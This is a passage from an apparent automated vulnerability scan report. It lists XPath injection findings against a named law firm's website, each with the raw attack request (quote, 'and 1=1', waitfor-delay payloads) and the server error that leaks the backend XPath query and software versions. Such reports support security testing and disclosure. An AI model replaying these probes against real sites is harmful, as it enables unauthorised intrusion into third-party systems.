X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6693
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/awardsrankings'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/awardsrankings'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/awardsrankings'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...
2.14. http://www.hoganlovells.com/newsmedia/fastfacts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/fastfacts/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/fastfacts/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:56:15 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...
2.15. http://www.hoganlovells.com/newsmedia/fastfacts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/fastfacts/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload '%20and%201%3d1--%20 was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/fastfacts'%20and%201%3d1--%20/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:56:18 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8120
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/fastfacts'%20and%201=1--%20']' has an invalid token.</title>
<style>
body {font-family:"Verda
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/fastfacts'%20and%201=1--%20']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/fastfacts'%20and%201=1--%20']' has an invalid token.]
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5070035
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.XPathParser.ParseFilterExpr(AstNode qyInput) +19
MS.Inter
...[SNIP]...
2.16. http://www.hoganlovells.com/newsmedia/newspubs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'waitfor%20delay'0%3a0%3a20'--/newspubs HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:06:01 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6663
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.</title>
<style>
body {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...
2.17. http://www.hoganlovells.com/newsmedia/newspubs [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs%2527 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:06:29 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...
2.18. http://www.hoganlovells.com/newsmedia/newspubs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'waitfor%20delay'0%3a0%3a20'--/newspubs/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:40 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6663
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.</title>
<style>
body {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...
2.19. http://www.hoganlovells.com/newsmedia/newspubs/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:54 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6663
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/newspubs'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/newspubs'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/newspubs'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...
2.20. http://www.hoganlovells.com/newsmedia/newspubs/List [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/newspubs/List HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:10 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8252
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...
2.21. http://www.hoganlovells.com/newsmedia/newspubs/List [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs%2527/List HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...
2.22. http://www.hoganlovells.com/newsmedia/newspubs/List [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs/List%2527 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:37 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...
2.23. http://www.hoganlovells.com/newsmedia/newspubs/List.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/newspubs/List.aspx HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...
2.24. http://www.hoganlovells.com/newsmedia/newspubs/detail.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/detail.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/newspubs/detail.aspx HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:55:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...
2.25. http://www.hoganlovells.com/newsmedia/timeline/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/timeline/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/timeline/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:57:47 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...
2.26. http://www.hoganlovells.com/newsmedia/timeline/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/timeline/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/timeline'/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:57:48 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...
2.27. http://www.hoganlovells.com/offices/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /offices/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /offices'/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:59 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...
2.28. http://www.hoganlovells.com/ourpeople/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /ourpeople/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /ourpeople'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:00:35 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6618
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='ourpeople'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"Verdana
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ourpeople'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ourpeople'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...
2.29. http://www.hoganlovells.com/practiceareas/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
